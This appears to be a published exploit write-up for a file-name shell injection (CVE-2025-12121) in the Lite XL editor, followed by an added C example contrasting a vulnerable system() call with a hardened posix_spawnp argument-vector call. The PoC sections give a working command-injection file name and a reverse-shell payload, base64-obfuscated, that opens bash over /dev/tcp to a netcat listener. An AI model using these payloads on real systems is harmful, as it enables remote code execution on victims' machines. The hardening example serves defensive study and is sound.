# Exploit Title: Lite XL <= 2.1.8 - system.exec() Shell Injection (RCE)
# Date: 2025-10-31
# Exploit Author: Dogus DEMIRKIRAN
# Vendor Homepage: https://github.com/lite-xl/lite-xl
# Version: <= 2.1.8
# Bugs: Remote Code Execution
# CVE: CVE-2025-12121
===============================================================================
# PoC (Filename Injection)
# Create a file with a malicious name:
touch '$(touch litexl_rce.txt)'
# In Lite XL, right-click → "Open In System"
# or any action that triggers system.exec().
# The file litexl_rce.txt will be created.
===============================================================================
# Reverse Shell PoC
# Attacker:
nc -lvnp 4444
# Victim:
touch '$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash)'
# Open directory in Lite XL and trigger:
# "Open In System"
# A reverse shell is returned to the listener.
===============================================================================
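The PoC works because the file name reaches a shell as part of a command string. The block below is an added example, not part of the original PoC file and not Lite XL source code: it contrasts that pattern with launching the opener through an argument vector. The function names, the double-quoted command format and the use of `cat` as a stand-in opener are assumptions made for illustration.

```c
/* Added example: constructed contrast, not Lite XL source code. */
#include <spawn.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Vulnerable pattern (assumed shape): the path is pasted into a string that
 * /bin/sh parses, so $(...) and backticks are expanded even inside double
 * quotes. Shown for contrast only; main() does not call it. */
int open_via_shell(const char *opener, const char *path)
{
    char cmd[4096];
    int n = snprintf(cmd, sizeof cmd, "%s \"%s\"", opener, path);
    if (n < 0 || (size_t)n >= sizeof cmd)
        return -1;                      /* refuse truncated commands */
    return system(cmd);
}

/* Hardened form: no shell is involved. The path is a single argv element,
 * so the opener receives it byte for byte and nothing in it is evaluated. */
int open_via_argv(const char *opener, const char *path)
{
    char *const argv[] = { (char *)opener, (char *)path, NULL };
    pid_t pid;
    int status;
    if (posix_spawnp(&pid, opener, NULL, NULL, argv, environ) != 0)
        return -1;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *name = "$(touch litexl_rce.txt)";  /* file name from the PoC */
    FILE *f = fopen(name, "w");
    if (!f) return 1;
    fclose(f);
    int rc = open_via_argv("cat", name);  /* "cat" stands in for the opener */
    printf("argv: exit=%d marker_created=%d\n",
           rc, access("litexl_rce.txt", F_OK) == 0);
    unlink(name);
    return 0;
}
```

Passing an absolute path to the opener also keeps a file name that begins with `-` from being read as an option.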